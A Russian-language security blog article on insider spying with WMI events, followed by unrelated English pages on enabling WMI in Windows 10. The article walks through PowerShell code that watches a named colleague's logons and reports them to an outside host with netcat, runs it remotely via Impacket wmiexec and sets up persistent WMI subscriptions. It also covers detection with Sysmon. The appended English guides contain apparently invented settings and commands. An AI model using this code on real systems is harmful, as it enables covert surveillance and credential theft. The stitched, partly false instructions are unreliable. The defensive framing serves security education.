Инструментарий управления Windows (WMI) — это подсистема PowerShell, которая обеспечивает администраторам доступ к мощным инструментам системного мониторинга. Этот инструментарий задумывался как быстрое и эффективное средство системного администрирования, однако далеко не все используют его с благими целями: с его помощью злоумышленники-инсайдеры могут шпионить за другими сотрудниками. Знание этой уязвимости WMI ощутимым образом упрощает обнаружение внутренних угроз и борьбу с ними.
В этой статье мы рассмотрим, что такое инструментарий WMI, для чего он нужен и как его можно использовать для отслеживания инсайдерской деятельности в системе. Мы также составили более подробное руководство, посвященное событиям WMI и инсайдерскому шпионажу, которое вы можете скачать бесплатно.
Краткий обзор: что такое WMI и для чего он нужен?
Приведем конкретный пример. С помощью WMI вы можете запросить, например, все большие файлы Excel, находящиеся в том или ином каталоге, а затем получать уведомление каждый раз при создании файла с заданным размером, например 1 Мб. Командлет Register-WmiEvent позволяет сделать все это с помощью одной не слишком сложной строки в PowerShell.
В хороших руках WMI может послужить многим благим целям, но точно так же он может стать инструментом вредоносной инсайдерской деятельности. Можно легко представить, как некий сотрудник с повадками Эдварда Сноудена использует WMI, чтобы шпионить за своими коллегами. Для этого ему даже не понадобятся особые технические знания.
Предположим, наш гипотетический инсайдер «случайно» подсмотрел, что его коллега Лекс периодически скачивает большие файлы Excel, содержащие номера социального страхования и другие личные данные клиентов. В этом случае наш незаметный инсайдер может соорудить нечто подобное:
Register-WmiEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance isa 'CIM_DataFile' and TargetInstance.FileSize > 2000000 and TargetInstance.Path = '\\Users\\lex\\Important' and targetInstance.Drive = 'C:’ and targetInstance.Extension =’xlsx’” -Action $action
Этот код запрашивает объект CIM_DataFile для получения доступа к информации о создании файла Excel в указанном каталоге, а затем запускает выполнение блока сценария. Ближе к концу этой статьи мы рассмотрим подробнее, как может выглядеть этот блок сценария в случае с нашим гипотетическим инсайдером.
Для чего используется инструментарий управления Windows
Прежде чем мы перейдем к изучению того, как WMI может использоваться инсайдерами в целях отслеживания, стоит отметить, что у него есть множество законных применений. Глобальное предназначение этой системы — свести воедино все средства управления устройствами и приложениями в корпоративных сетях. Таким образом, WMI может использоваться:
- для сбора информации о статусе локальных и удаленных компьютерных систем
- настройки параметров безопасности для удаленных компьютеров и приложений
- настройки и редактирования свойств системы
- настройки и редактирования разрешений для авторизованных пользователей и групп
- выполнения кода и сериализации объектов (своеобразный «SSH на стероидах»)
- назначения и редактирования меток дисков
- создания графика выполнения процессов
- резервного копирования репозиториев объектов
- включения и отключения регистрации ошибок
Доступ ко всем этим функциям можно получить с помощью PowerShell и WMIC — интерфейса командной строки WMI. Как видите, у WMI есть самые разные применения, и эта система позволяет отслеживать и редактировать множество разнообразных параметров в компьютерной сети.
Архитектура инструментария управления Windows
Инструментарий WMI является частью операционной системы Windows, и он предварительно установлен на всех операционных системах, начиная с Windows 2000. WMI состоит из следующих компонентов:
- Служба WMI — это реализация системы WMI в Windows. Этот процесс отображается под именем «Инструментарий управления Windows» и является связующим звеном между поставщиками WMI, репозиторием WMI и управляющими приложениями. Данный процесс запускается автоматически при включении компьютера.
- Управляемые объекты — это любые логические или физические компоненты либо службы, которыми можно управлять с помощью WMI. К таким объектам могут относиться самые разные компоненты, поскольку WMI может получить доступ к любому параметру или объекту, к которым имеют доступ другие инструменты Windows, такие как системный монитор.
- Поставщики WMI — это объекты, которые отслеживают события и данные конкретного объекта. Существует множество различных типов поставщиков WMI как общего назначения, так и предназначенных для конкретных устройств. Многие из них предварительно встроены в систему Windows.
- Классы используются поставщиками WMI для передачи данных службам WMI. В классах содержатся события и свойства, позволяющие получать и настраивать данные. Системные классы WMI предварительно определены и начинаются с двойного подчеркивания.
- Методы, будучи привязанными к конкретным классам, позволяют выполнять действия на основе имеющихся в них данных. Например, методы можно использовать для запуска и завершения процессов на удаленных компьютерах. Доступ к методам можно получить с помощью приложений для обработки сценариев или сетевого администрирования.
- Репозиторий WMI — это база данных, в которой хранятся все статические данные, связанные с WMI. Динамические данные не хранятся в репозитории. Доступ к ним можно получить через класс поставщика WMI.
- Диспетчер объектов CMI — это система, которая находится между управляющим приложением и поставщиками WMI. Она запрашивает данные у этих поставщиков и затем передает их приложению.
- API WMI выполняет эти операции и предоставляет приложениям доступ к инфраструктуре WMI без привязки к типу используемого устройства.
- Потребитель WMI — это сущность, которая отправляет запросы объектам через диспетчер объектов. Обычно потребитель WMI является приложением для мониторинга, таким как PRTG Network Monitor, управляющим приложением или сценарием PowerShell.
Выполнение запросов WMI
Самым простым способом выполнения запроса WMI является запуск WMIC в стандартной командной строке Windows. Выполните следующие действия, чтобы получить информацию о процессоре, используемом на локальном компьютере:
- Откройте командную строку
- Введите WMIC для вызова программы и нажмите клавишу Enter
- Появится окно командной строки WMIC
- В командной строке можно выполнять запросы WMI. Самый простой запрос — это просмотр информации о локальном процессоре, который можно выполнить с помощью следующей команды:
WMIC CPU
- Результаты будут отображены в командной строке
Практически все команды, которые будут рассмотрены ниже, выполняются таким образом. Однако WMI позволяет получать гораздо более подробную информацию, чем сведения о процессоре, и в том числе от удаленных компьютеров и приложений.
Практикум по использованию событий WMI для наблюдения за системой
В этом разделе мы рассмотрим, как с помощью WMI выполнять команды и отслеживать процессы на удаленных компьютерах. Подобные приемы можно использовать в составе системы анализа поведения пользователей и сущностей (UEBA) для автоматического мониторинга процессов во всей системе и проверки на инсайдерские угрозы, о которых свидетельствуют подозрительное поведение или аномальные события.
Использование функциональности wmiexec из Impacket
В WMI можно выполнять разные функции, помимо управления событиями. В нем можно запускать процессы и выполнять команды в окнах Windows как на локальных, так и на удаленных компьютерах. Ради интереса попробуйте ввести команду wmic process call create ‘notepad.exe’ в сеансе PowerShell, чтобы открыть старый текстовый редактор Microsoft. При этом используется замечательный инструмент командной строки wmic, входящий в состав WMI. Здорово, правда?
Если бы я добавил параметр /Node:, а затем имя удаленного компьютера Windows, то смог бы запустить Блокнот на нем, при условии что у меня есть соответствующие разрешения. Совершенно ясно, что на практическом уровне wmic является незаменимым помощником для системных администраторов.
Прежде чем вы начнете возмущаться: я знаю, что существуют эквивалентные командлеты PowerShell. Однако я считаю, что синтаксис wmic легче запомнить.
Было бы здорово, если бы я мог с помощью WMI создать простую и незаметную псевдооболочку.
Скрытая псевдооболочка, созданная с помощью wmiexec
К моему везению, это можно сделать в Impacket. В тестовой среде Amazon я использовал свой любимый wmiexec для доступа к WMI через виртуальную машину Linux. В wmiexec предусмотрена возможность создания псевдооболочки: каждый раз, когда на стороне клиента вводится команда, на целевом компьютере создается отдельная оболочка для выполнения этой команды.
И в psexec, и в smbexec для запуска команд в удаленной системе используются службы Windows. Работа smbexec протекает незаметнее, так как он быстро создает, а затем удаляет службу, а psexec, наоборот, оставляет ее на виду.
Инструмент wmiexec напрямую запускает cmd.exe для удаленного выполнения команды. Созданную команду можно найти в средстве просмотра событий. Обратите внимание, что мы избежали привлекающих внимание служб Windows
Инструмент wmiexec абсолютно не затрагивает службы, вместо этого используя описанные выше возможности WMI для непосредственного запуска процесса. При поиске возможных источников угроз специалисты по безопасности редко начинают с WMI, в то время как службы обычно являются хорошим местом для начала поиска улик, указывающих на атаку. Хороший ход, wmiexec!
Использование событий WMI для наблюдения за пользователями
Пока я тешил себя мыслью, что я один такой умный и занимаюсь экспериментами с WMI, оказалось, что ребята, занимающиеся тестами на проникновение, уже давно поняли, как все работает. Вам обязательно нужно прочитать потрясающую презентацию Мэтта Грэбера (Matt Graeber) с конференции Black Hat 2015 года, где он рассказывает, как злоумышленники могут превратить WMI и весь его арсенал для работы с событиями в инструмент для взломов.
В моей истории я представляю себе инсайдера а-ля Сноуден, который обладает некоторыми техническими знаниями, но не глубокой хакерской мудростью, и которому доверяют другие сотрудники. Этому человеку не нужно знать все про WMI. Ему нужно знать только то, что требуется для работы на удаленном компьютере и инициирования событий.
Помимо файловых объектов, есть еще один интересный класс объектов, который можно изучить с помощью WMI, — win32_LogOnSession. Запрос этого базового объекта Windows позволяет найти пользователей, которые в данный момент находятся в системе. Затем можно использовать блок сценария действий Register-WmiEvent для запуска сценария PowerShell при удаленном входе нового пользователя в систему. Уловили суть? Злоумышленник может получать уведомления каждый раз, когда пользователь, за которым он следит, входит в целевую систему.
Вот что я набросал:
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" –Action $action
Следующий вопрос — как запрограммировать выполнение блока сценария. Загадочного инсайдера из моих фантазий интересует конкретный пользователь — Круэлла. Наш злодей потихоньку шпионил за Круэллой и теперь планирует использовать собранную информацию, чтобы взломать ее рабочую учетную запись.
Задача блока сценария — проверить, кто вошел в систему, и определить, была ли это Круэлла. Я написал несколько строк кода PowerShell для этой цели, но это явно не самый лучший способ. Я никак не использую информацию о событии, передаваемую в блок сценария, а именно сведения о новом пользователе. Я наталкиваюсь на препятствия, причины которых я не могу понять в данный момент. Для этого нужно больше технических знаний, чем наш гипотетический инсайдер имеет или готов приобрести.
Вместо этого я просто перебрал список пользователей, возвращаемых gwmi Win32_Process (попробуйте запустить этот командлет в сеансе PowerShell), и сопоставил их с параметром «Круэлла». Можете полюбоваться на мое финальное решение:
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {
$names=gwmi Win32_Process|% { $_.GetOwner().User}
foreach ($user in $names){
if ($user -eq "cruella") {
echo "cruella logged in"| C:\Users\lex\Documents\nc.exe 172.31.19.75 80
}
}
}
Register-WmiEvent позволяет сохранять скрытность, поскольку он запускается только при новом входе в систему, вместо того чтобы регулярно запрашивать объект Win32_Process, что может быть довольно заметным.
Помните, что наш инсайдер старается не привлекать к себе внимания. У нее есть доступ к удаленной системе через psexec, smbexec или wmiexec (самый незаметный способ). Однако ей не нужно постоянно бродить туда-сюда по системе жертвы.
В этом и прелесть использования событий WMI. Вы можете дождаться уведомления от Register-WmiEvent, а затем спокойно сделать свой ход.
Интеграция Netcat и WMI
Но каким образом сценарий возвращает горячую новость о том, что Круэлла вошла в систему на целевом компьютере?
Если вы заметили, что я использовал команды Netcat выше, можете поставить себе плюсик. Netcat — известная и универсальная утилита, позволяющая устанавливать соединения (необязательно для вредоносного ПО). С помощью нее можно выполнять обратное подключение или просто передавать сообщения по сети. Я воспользовался этой второй возможностью.
Приведенный выше сценарий отправляет сообщение Netcat в режиме ожидания и отображает надпись «Круэлла вошла в систему». Миссия выполнена.
Вы можете представить себе, как наш мошенник затем сбрасывает хеши с помощью инструмента secretsdump Impacket, взламывает хеш учетных данных Круэллы, после чего запускает wmiexec, используя разрешения Круэллы, для поиска более ценных данных.
Код Register-WmiEvent можно запустить напрямую. Обратите внимание на отображаемый идентификатор события
Устранение недочетов в механизме наблюдения WMI
В рамках этого примера я хотел удаленно запустить (используя wmiexec) полезную программу, которая будет предупреждать меня, когда конкретный пользователь, то есть Круэлла, входит в систему. После этого я мог спокойно сбросить и взломать ее учетные данные. Это был бы самый незаметный способ — удаленный доступ и никаких файлов. Единственная проблема, как мне поначалу казалось, заключалась во временном характере событий WMI.
Поэтому мне нужно было заключить мое непристойно длинное Register-WMIEvent (ниже) в командную строку PowerShell с параметром –noexit, обеспечивающим сохранение сеанса PowerShell после выполнения Register-Event, а значит, и сохранение события.
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process|% { $_.GetOwner().User};foreach ($user in $names){if ($user -eq "cruella") {echo "cruella logged in"| C:\Users\lex\Documents\nc.exe 172.31.19.75 80}}}
Когда я начал работать над этим, я понял, что должен «преобразовать» специальные символы, такие как $, “ и |, и передавать их как литералы непосредственно в PowerShell. Еще одна головная боль: мне в итоге пришлось отказаться от использования вертикальных линий, поскольку они вызывали ошибки анализа. Не спрашивайте. Постепенно я пришел к этой длинной строке кода:
$command="powershell -noexit -C Register-WMIEvent -Query ""Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3"" -Action {`$names = gwmi Win32_Process; `$users=@(); foreach (`$n in `$names) {`$users += `$n.GetOwner().User}; foreach (`$u in `$users) {if (`$u -eq ""cruella"") {.\wmiexec C:\Users\lex\Documents\nc.exe 172.31.18.92 80 }}}
.\wmiexec.exe corp.acme/lex@172.31.46.115 "$command"
Она выглядела многообещающе и, казалось, работала правильно, если верить журналу событий Windows в целевой системе. Однако, присмотревшись, я понял, что она не работает. Я уверен, что в итоге смог бы привести ее в нужный вид, но для этого мне потребовалось бы время и кофе, много кофе. Есть и другой вариант, чуть менее незаметный и совсем не бесфайловый: можно использовать smbclient для переноса сценария, а затем запустить его напрямую на целевом компьютере.
Удаленное выполнение сложного командлета Register-Event казалось мне абсолютно правильным. Но оно не работало. Ну и ладно
Увы, на этом этапе мои предположения о том, что сообразительный, но не слишком опытный инсайдер мог бы легко использовать временные события WMI для скрытого наблюдения, стали потихоньку разваливаться.
Почему при наблюдении нужно использовать постоянные события?
Правильный и одновременно требующий более глубоких знаний способ заключается в использовании постоянных событий WMI. Постоянные события WMI, хотя и представляют некоторую сложность, не только являются более эффективным инструментом для шпионов-инсайдеров, чем временные события, но и позволяют гораздо эффективнее отслеживать внутренние угрозы.
Изучение постоянных событий потребует некоторого времени, но они представляют наиболее эффективный способ реализации строгой системы мониторинга для больших систем. Они обладают более широкими возможностями, чем временные события WMI. Их также можно использовать для оповещения о нестандартной вредоносной активности, такой как DNS-туннелирование или нарушение политик Zero Trust.
Я посвятил изучению постоянных событий пару дней и обнаружил, что в PowerShell есть специальный командлет, который упрощает процесс создания фильтра событий, потребителя и объектов WMI между фильтром и потребителем. Как мы все знаем, PowerShell предоставляет администраторам широкие возможности для упрощения работы. К сожалению, данный пример показывает, как этими прекрасными возможностями могут воспользоваться злоумышленники.
Инсайдер создает постоянное событие на целевой системе, тем самым освобождая себя от необходимости присутствовать в сеансе оболочки. Событие остается там навсегда или до тех пор, пока не будет удалено явным образом. Подробнее о том, как это сделать, можно прочитать здесь , но в целом процесс похож на то, что я сделал выше с временным событием. Последнее, что потребуется от нашего хакера, — связать фильтр события с потребителем события.
Соглашусь, что для обычного сотрудника, который вдруг решил стать злобным хакером, это выглядит слишком круто. Ради интереса я почитал разные форумы и увидел, что многие люди безуспешно бьются над тем, чтобы заставить постоянные события WMI работать. Однако это вовсе не выходит за рамки возможностей нашего «Сноудена» и других сообразительных системных администраторов, которые решили перейти на темную сторону.
Постоянные события: советы для ИТ-администраторов
Эти методы не предназначены для обучения потенциальных хакеров или обиженных сотрудников, которые хотят отомстить работодателю. Все, чего я хочу, — это помочь ИТ-специалистам понять образ мысли хакера, чтобы они могли внедрить соответствующую защиту от атак на проникновение. Для них я показываю, как настроить фильтр и объекты потребителя с помощью командлета Set-WmiInstance:
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
EventNamespace = 'root/cimv2'
Name = “cruella”
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser'"
QueryLanguage = 'WQL'
}
$command = "powershell.exe -Command {$names = gwmi Win32_Process; $users=@(); foreach ($n in $names) {$users += $n.GetOwner().User}; foreach ($u in $users) {if ($u -eq 'cruella') { C:\users\lex\Documents\nc.exe 172.31.45.240 10000}}}"
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
Name = "Consumer"
CommandLineTemplate = $Command
}
Ваше домашнее задание — придумать код PowerShell, который свяжет эти два компонента воедино.
В ходе моих собственных тестов я смог заставить постоянное событие работать на целевой системе без чрезмерных усилий и страданий. Как вы помните, этого было весьма сложно добиться с временными событиями WMI, которые длятся ровно столько, сколько и сеанс PowerShell.
Настроив постоянное событие WMI, чтобы, например, следить за входом пользователей в систему, инсайдер или хакер не обязан оставаться в целевой системе. Дополнительным бонусом является то, что постоянное событие WMI является устойчивым: при перезагрузке компьютера триггеры событий по-прежнему действуют. Это делает постоянные события WMI мощным и скрытным способом инициировать атаку, которая может включать гораздо больше, чем просто мониторинг. Как вы помните, события WMI — далеко не самое первое место, где специалисты по безопасности будут искать источник атаки.
Например, код PowerShell для потребителя события может выступать как средство запуска и скачивать вредоносное ПО, хранящееся на удаленном сервере, с помощью DownloadString. Великолепная презентация Мэтта Грэбера на конференции Black Hat содержит много информации о вредоносном потенциале постоянных событий WMI.
Если вы специалист по безопасности, то как вы будете работать с событиями WMI с точки зрения их потенциального вредоносного использования?
Удача на вашей стороне: с помощью командлета Get-WmiObject (псевдоним gwmi) можно создать список фильтров событий, потребителей и связывающих объектов:
Вы перечисляете постоянные события WMI с помощью Get-WMIObject и устанавливаете соответствующие параметры. Обратите внимание на отсутствие отметки о времени создания.
Теперь, если фильтр (или потребитель) постоянного события покажется им подозрительным, ИТ-специалисты могут отключить его путем удаления с помощью конвейера PowerShell и командлета WMI-RemoveObject:
Удаление постоянных событий WMI включает использование конвейера PowerShell
Обратите внимание, что здесь не указано ни время создания события, ни имя злонамеренного пользователя. Для получения этой криминалистической информации потребуется обратиться к журналам событий Windows. Подробнее об этом ниже.
Можно ли отключить постоянные события WMI?
По крайней мере, ИТ-специалисты могут быстро увидеть зарегистрированные постоянные события WMI и приступить к анализу сценариев реальных событий на наличие признаков угроз. Возможно, как опытный специалист по ИТ-безопасности, вы считаете, что не всем нужен WMI на ноутбуках и лучшая стратегия по работе с уязвимостями постоянных событий WMI — это совсем отключить WMI.
Можно попробовать отключить службу Winmgmt, которая запускает WMI. На практике это не так уж просто. В ходе моих собственных тестов я так и не смог отключить эту службу: она автоматически запускалась снова и снова.
Предположим, что вам все же удалось отключить ее. Административное программное обеспечение Windows во многом зависит от WMI и не будет работать, если Winmgmt недоступна. По всему Интернету форумы наполнены сообщениями, предостерегающими от отключения WMI. Советую к ним прислушаться и помиловать ваш WMI.
Выявление событий WMI, представляющих угрозу, с помощью Sysmon и SIEM
В общем, вам придется принять уязвимость событий WMI как факт. К счастью, есть более эффективные способы обнаружения постоянных событий и других подозрительных операций с событиями в Windows, чем использование вышеупомянутого командлета Powershell.
Знакомьтесь, Sysmon! Я не буду вдаваться в подробности, рассказывая об этой бесплатной утилите Windows, которую можно загрузить здесь, в этой статье. Скажу лишь, что она позволяет получать очень полезную информацию для анализа в одном месте, вместо того чтобы просматривать каждый журнал событий Windows по отдельности. Пользователям Windows 7 и более поздних версий возможности Sysmon могут не понадобиться, поскольку в новых системах Windows используются более совершенные механизмы ведения стандартных журналов.
Sysmon — удобная и понятная утилита для регистрации событий от Microsoft
Sysmon назначает идентификатор события 19 созданию постоянного событию фильтра WMI (20 назначается созданию события потребителя WMI, а 21 — связыванию WMI). Если вы откроете средство просмотра событий, вы найдете журнал событий Sysmon в разделе Microsoft -> Windows -> Sysmon.
Вы не хотите открывать средство просмотра событий вручную, чтобы отслеживать постоянные события WMI, которые могут быть признаком хакерской активности. Мы знаем, как вам помочь.
Почему бы не создать фильтр постоянных событий WMI для мониторинга создания (догадались?) постоянного события WMI?
На GitHub есть небольшой проект, где вы найдете код для настройки этой операции. Вот фрагмент кода для фильтра событий WMI, который позволяет отслеживать создание… да-да, фильтра событий WMI:
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
EventNamespace = 'root/subscription'
Name = '_PersistenceEvent_'
Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 Where TargetInstance ISA "__EventConsumer"'
QueryLanguage = 'WQL'
}
Очевидно, что здесь нам понадобится помощь средств по управлению информационной безопасностью и событиями безопасности (SIEM), поскольку улики погребены в завалах журналов. Я думаю, вы понимаете, к чему все идет. Вам понадобится решение для мониторинга безопасности, объединяющее функции SIEM с анализом других угроз для обнаружения и устранения угроз, связанных с постоянными событиями WMI.
Часто задаваемые вопросы об инструментарии управления Windows
Описанные выше методы вполне могут быть использованы для реализации системы наблюдения в вашей сети, однако у вас могли остаться некоторые вопросы о WMI. В этом разделе мы ответим на самые распространенные из них.
WMI объявлен устаревшим?
Сам WMI не устарел, но была объявлена устаревшей WMIC, что вводит многих людей в заблуждение. Для доступа к функциям, ранее обеспечиваемым WMIC, теперь используется PowerShell.
Какие порты использует WMI?
WMI использует TCP-порт 135 и ряд динамических портов: 49152-65535 (динамические порты RPC: Windows Vista, 2008 и выше), TCP 1024-65535 (динамические порты RPC: Windows NT4, Windows 2000, Windows 2003). Вы также можете настроить для WMI пользовательский диапазон портов.
WMI использует WimRM?
Данная конфигурация не является стандартной, однако вы можете использовать WMI для получения данных с помощью сценариев или приложений, использующих WinRM Scripting API, или с помощью инструмента командной строки Winrm. WinRM может использовать WMI для сбора данных о ресурсах или для управления ресурсами в операционной системе Windows.
Заключение
Как мы увидели, WMI предоставляет администраторам мощный инструмент для мониторинга удаленных процессов и компьютеров и может использоваться при разработке соглашений о мониторинге конечных пользователей (EUMA) для автоматического оповещения о подозрительной активности. Это делает его отличным инструментом для обнаружения и устранения внутренних угроз, предотвращения попыток обойти политики безопасности, а также наблюдения за тем, как используются ваши системы.
Если вы хотите узнать больше о том, как использовать WMI для наблюдения за инсайдерской деятельностью, вы можете скачать наше подробное руководство здесь.
Are you having trouble enabling WMI on your Windows 10 computer? With the right steps, you can easily enable WMI on your Windows 10 computer and access the data and information that you need. In this article, we will provide a step-by-step guide on how to enable WMI on Windows 10 so that you can access the data and information that you need with ease.
Enable WMI (Windows Management Instrumentation) on Windows 10
- Press the Windows key + R to open the Run command box.
- Type services.msc and press Enter.
- In the Services window, scroll down and look for Windows Management Instrumentation service.
- Right-click on it and click on Properties.
- In the Windows Management Instrumentation Properties window, click on the Log On tab.
- Check the “Allow services to interact with desktop” box.
- Click on Apply and OK.
- Restart the computer.
What is WMI?
Windows Management Instrumentation (WMI) is a set of specifications from Microsoft for consolidating the management of devices and applications in a Windows-based operating system. It provides users with an interface that helps them to manage and access information about their hardware, operating system, and applications. WMI can also be used to access and manage remote computers.
WMI is also used for monitoring and managing applications, such as databases, as well as for configuring and managing Windows-based operating systems. Through its use of the Component Object Model (COM) and Distributed Component Object Model (DCOM), WMI enables remote communication and management of applications and services.
How to Enable Wmi Windows 10?
Enabling WMI on Windows 10 is a simple procedure. You can use the PowerShell command prompt or the Windows 10 Settings app to enable WMI. Here’s how to do it.
Using the Windows 10 Settings App
To enable WMI using the Windows 10 Settings app, open the Settings app, select the “Update & Security” category, and then select the “Windows Security” option. On the Windows Security page, select the “Windows Management Instrumentation” option and then select the “Enable” option.
Using the PowerShell Command Prompt
To enable WMI using the PowerShell command prompt, open a PowerShell command prompt as an administrator and type the command “Enable-WindowsOptionalFeature -Online -FeatureName ‘Windows-Management-Instrumentation’”.
Configuring WMI
Once WMI is enabled, you can configure it to meet the needs of your environment. To do this, open the Control Panel and select the “Administrative Tools” option. On the Administrative Tools page, select the “Computer Management” option and then select the “Services and Applications” option.
Using the Services Console
In the Services console, select the “Windows Management Instrumentation” option and then select the “Properties” option. On the Properties page, you can configure the startup type, logon account, and other settings as needed.
Using the WMI Control Console
You can also use the WMI Control console to configure WMI. To do this, open the Control Panel, select the “Administrative Tools” option, and then select the “WMI Control” option. On the WMI Control page, select the “Properties” option and then configure the settings as needed.
Testing WMI
Once WMI is enabled and configured, you can test it to make sure it is working properly. To do this, open a PowerShell command prompt as an administrator and type the command “Get-WmiObject -Class Win32_ComputerSystem”. If WMI is working properly, the command will return information about the computer’s system.
Using the WMI Test Utility
You can also use the WMI Test Utility to test WMI. To do this, open the Control Panel and select the “Administrative Tools” option. On the Administrative Tools page, select the “WMI Test Utility” option and then select the “Test” option. The Test utility will run a series of tests to make sure WMI is working properly.
Using the WMI Explorer
The WMI Explorer is another tool that can be used to test WMI. To use the WMI Explorer, open the Control Panel and select the “Administrative Tools” option. On the Administrative Tools page, select the “WMI Explorer” option and then select the “Explore” option. The WMI Explorer will display a list of WMI objects and you can use it to test WMI.
Top 6 Frequently Asked Questions
Q1: What Is WMI?
Answer: Windows Management Instrumentation (WMI) is a set of specifications from Microsoft for consolidating the management of devices and applications in a network. It is a component of the Windows operating system that provides management information and control in an enterprise environment. WMI allows systems administrators to query and set information on desktop systems, applications, and networks. WMI can also be used to remotely execute programs on other computers.
Q2: How Do I Enable WMI on Windows 10?
Answer: You can enable WMI on Windows 10 by using the Windows Registry or the Group Policy Editor. To use the Windows Registry, open the Registry Editor and navigate to the following path: \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM. In the right pane, double-click the Autorecover MOFs value and set the Value data to 1. To use the Group Policy Editor, open the Run window (Windows key + R) and type gpedit.msc. Navigate to Computer Configuration > Administrative Templates > System > Windows Remote Management (WinRM) > WinRM Service and double-click Allow Automatic Configuration of listeners. Enable the policy.
Q3: How Do I Check If WMI Is Enabled?
Answer: To check if WMI is enabled, open the Run window (Windows key + R) and type wmimgmt.msc. This will open the Windows Management Instrumentation service. If the service is running, then WMI is enabled. You can also open the Command Prompt and type wmic and press enter. If the command is successful, WMI is enabled.
Q4: What Are the Benefits of Enabling WMI?
Answer: Enabling WMI allows you to remotely manage and monitor the machines on your network. It is also useful for automating tasks, such as deploying software or running scripts. WMI can be used to query system information, such as installed software, available disk space, and installed hardware. WMI can also be used to control services, processes, and other system tasks.
Q5: Are There Any Security Considerations When Enabling WMI?
Answer: Yes, there are security considerations when enabling WMI. By enabling WMI, you are granting remote access to the machine, which could potentially be used to gain unauthorized access to the system. To ensure that WMI is secure, it is important to properly configure the Windows Firewall and access control lists.
Q6: Is There Any Documentation on How to Enable WMI?
Answer: Yes, Microsoft provides extensive documentation on how to enable WMI on Windows 10. The documentation includes step-by-step instructions on how to enable WMI using the Windows Registry or the Group Policy Editor, as well as information on how to configure the Windows Firewall and access control lists. The documentation can be found on Microsoft’s website.
How To: Enable the WMI Monitoring Service in Windows
Now, you know how to enable WMI in Windows 10 and the benefits associated with it. WMI is a powerful feature and a great way to manage your Windows 10 system. Whether you need to get the latest information from your system or use it to monitor the performance of your hardware, WMI can help you out. Use it to your advantage and make the most out of your system!
If you’re a Windows 10 user and you’re looking to use Windows Management Instrumentation (WMI) on your system, then this article is for you. WMI is a powerful set of tools that allows users to manage and monitor their Windows systems. In this article, we’ll guide you through the process of enabling WMI on Windows 10. We’ll also discuss the benefits of enabling WMI and the risks of doing so. So, if you’re ready to learn how to enable WMI on your Windows 10 system, let’s get started!
Enabling WMI Windows 10: To enable Windows Management Instrumentation (WMI) on Windows 10, use these steps:
- Open Start.
- Search for Services and click the top result.
- Search for Windows Management Instrumentation and double-click the top result.
- Click the Stop button.
- Click the drop-down menu next to Startup type.
- Select the Automatic option.
- Click the Apply button.
- Click the Start button.
- Click the OK button.
How to Enable Windows Management Instrumentation (WMI) in Windows 10?
Windows Management Instrumentation (WMI) is a Windows-based service that is used to collect and view system data and manage activities on Windows-based computers. It is an important part of the Windows operating system and is used by administrators to monitor and manage the system. WMI is a powerful tool that can be used to configure, monitor, and manage various aspects of Windows 10. In this article, we will show you how to enable WMI in Windows 10.
What is WMI?
Windows Management Instrumentation (WMI) is a Windows-based service that is used to collect and view system data and manage activities on Windows-based computers. It is an important part of the Windows operating system and is used by administrators to monitor and manage the system. WMI provides an interface to access and manage data on the system, such as hardware information, software information, event logs and user accounts.
Why Enable WMI on Windows 10?
Enabling WMI on Windows 10 provides an easy way to monitor, manage, and configure various aspects of the computer, such as hardware and software information, event logs, user accounts, and more. Furthermore, WMI can be used to troubleshoot and diagnose problems with the system.
How to Enable WMI in Windows 10?
Enabling WMI in Windows 10 is a simple process that can be done in a few steps. The following steps will guide you through the process of enabling WMI on Windows 10.
Step 1: Open Services Window
The first step is to open the Services window. To do this, press the Windows key + R to open the Run dialog box, then type in “services.msc” and press Enter. This will open the Services window.
Step 2: Enable WMI Service
Once the Services window is open, you need to find the Windows Management Instrumentation (WMI) service. To do this, scroll down the list of services until you find the WMI service. Right-click on the WMI service and select “Properties” from the context menu.
In the Properties window, go to the “General” tab and set the “Startup type” to “Automatic”. Then, click on the “Start” button to start the service. Once the service has started, click on the “OK” button to save the changes.
Step 3: Enable Remote WMI Access
The next step is to enable remote WMI access. To do this, go to the “Security” tab in the Properties window and enable the “Remote Enable” option. Then, click on the “OK” button to save the changes.
Step 4: Restart the Computer
Once you have enabled WMI and enabled Remote WMI access, you need to restart the computer for the changes to take effect. To restart the computer, open the Start menu, click on the “Power” button, and select “Restart”.
Once the computer is restarted, WMI should be enabled on the computer and you should be able to access and manage the system using WMI.
Related Faq
What is WMI?
WMI stands for Windows Management Instrumentation. It is a technology used by Microsoft Windows operating systems to provide a means of monitoring and managing various system components. WMI allows administrators to query and set various system settings, such as network configuration, system performance, and user accounts. It also provides a means of automating system tasks, such as installing software or backing up data.
What is Windows 10?
Windows 10 is a personal computer operating system released by Microsoft as part of the Windows NT family of operating systems. It was released on July 29, 2015 and is the successor to Windows 8.1. Windows 10 is designed to provide a more personal experience, with an emphasis on security and improved performance. It is the latest version of Windows and is available in both 32-bit and 64-bit versions.
How to Enable Wmi Windows 10?
In order to enable WMI in Windows 10, you need to open the Control Panel and go to “Administrative Tools”. Then, select “Services” and scroll down to the “Windows Management Instrumentation” service. Right-click and select “Properties”. In the “Startup type” drop-down menu, select “Automatic” and then click “Start”. Finally, click “OK” to save the changes.
What are the Benefits of WMI?
The benefits of WMI to system administrators are numerous. It provides an easy way to manage various system components, such as network configuration, system performance, and user accounts. It also provides a way to automate system tasks, such as installing software or backing up data. Additionally, WMI allows for remote management of systems, making it easier to manage multiple systems at once.
What are the Prerequisites for Enabling WMI?
